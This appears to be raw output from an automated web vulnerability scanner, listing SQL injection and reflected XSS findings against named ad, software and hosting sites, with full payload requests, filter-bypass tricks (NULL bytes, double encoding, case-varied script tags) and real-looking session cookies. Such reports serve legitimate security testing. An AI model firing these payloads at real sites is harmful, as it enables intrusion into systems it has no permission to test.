1.1. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.4 [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://ad.doubleclick.net
Path:
/adi/N3671.tribe.net/B5229711.4
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N3671.tribe.net/B5229711.4;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/;ord=1246537210?&1'%20and%201%3d1--%20=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:25:59 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:25:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6872
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Mar 03 15:57:06 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/998766/1013_300x250_Promo_FreePhone_OptimusTv2_Stnd.swf"; var gif = "http://s0.2mdn.net/998766/1013_300x250_Promo_FreePhone_OptimusTv2_Static.jpg"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/r%3B236462304%3B0-0%3B0%3B59988977%3B4307-300/250%3B40697905/40715692/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=LG-Optimus-T-Black&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjCR5fbFAl%20aCjCdyww%20VtBEwl"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/r%3B236462304%3B0-0%3B0%3B59988977%3B4307-300/250%3B40697905/40715692/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=LG-Optimus-T-Black&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjCR5fbFAl%20aCjCdyww%20VtBEwl"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){i ...[SNIP]...
Request 2
GET /adi/N3671.tribe.net/B5229711.4;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/;ord=1246537210?&1'%20and%201%3d2--%20=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:26:00 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:26:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6890
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Mar 03 16:23:16 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/998766/1015_300x250_Promo_FreePhone_SamsungGravityTv2_Stnd.swf"; var gif = "http://s0.2mdn.net/998766/1015_300x250_Promo_FreePhone_SamsungGravityTv2_Static.jpg"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/x%3B236462304%3B1-0%3B0%3B59988977%3B4307-300/250%3B40710683/40728470/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=Samsung-Gravity-T&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjC7yzMbfY%20aCjCdyww%20VtBEwl"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/x%3B236462304%3B1-0%3B0%3B59988977%3B4307-300/250%3B40710683/40728470/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=Samsung-Gravity-T&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjC7yzMbfY%20aCjCdyww%20VtBEwl"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.l ...[SNIP]...
The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /adi/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212?%00' HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:14:24 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6809
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adi/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212?%00'' HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:14:25 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 827
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /cart/ HTTP/1.1 Host: store.port80software.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16%2527 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; __utmc=250101639; __utmb=250101639.1.10.1300635924; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; wooMeta=MjMxMDAmMSYwJjIwJjEzMDA2MzU5MTA2MjMmMTMwMDYzNTkxMDYyMyYmMTAwJiY1MDAwNzkmJiYm
Response 1
HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 8958
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>store.po ...[SNIP]... <a href='getting/src/vessels.html'>failed.</a> ...[SNIP]...
Request 2
GET /cart/ HTTP/1.1 Host: store.port80software.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16%2527%2527 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; __utmc=250101639; __utmb=250101639.1.10.1300635924; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; wooMeta=MjMxMDAmMSYwJjIwJjEzMDA2MzU5MTA2MjMmMTMwMDYzNTkxMDYyMyYmMTAwJiY1MDAwNzkmJiYm
Response 2
HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 2407
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>store.po ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: www.port80software.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=' User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMSYxJjI0MjA0NyYxMzAwNjM1OTEwNjIzJjEzMDA2MzYxNTI2NTAmJjEwMCYmNTAwMDc5JiYmJg==; countrycode=XX
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>www.port ...[SNIP]... <H2> "I have not failed. I've just found 10,000 ways that won't work." -<a href='../servlet/nature/first'> ...[SNIP]...
Request 2
GET / HTTP/1.1 Host: www.port80software.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q='' User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMSYxJjI0MjA0NyYxMzAwNjM1OTEwNjIzJjEzMDA2MzYxNTI2NTAmJjEwMCYmNTAwMDc5JiYmJg==; countrycode=XX
Response 2
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 20 Mar 2011 17:02:01 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDASTASRQD=DAIKIALCFAPJCAFOKFDFEKGL; path=/ Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=09C55D26877C72426084F1DE8284520DA0364363; path=/; HttpOnly; Vary: Accept-Encoding Content-Length: 22219
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 8592
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>www.port ...[SNIP]... <H3> "I have not failed. I've just found 10,000 ways that won't work."<a href='little.php?id=25911&pg=1940'> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>www.port ...[SNIP]... <TD> "I have not failed. I've just found 10,000<a href='beauty?template=.shtml&id=30611&template=.php&item=18783&template=.jsp'> ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.0 404 Not Found Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=;path=/;Max-Age=0 Set-Cookie: ASPSESSIONIDASTASRQD=;path=/;Max-Age=0 Content-Type: text/html Content-Length: 4751
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>www.port ...[SNIP]... <H1>"I have not failed. I've just found 10,000 ways that won't work." - Thomas Alva Edison</H1> ...[SNIP]...
The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
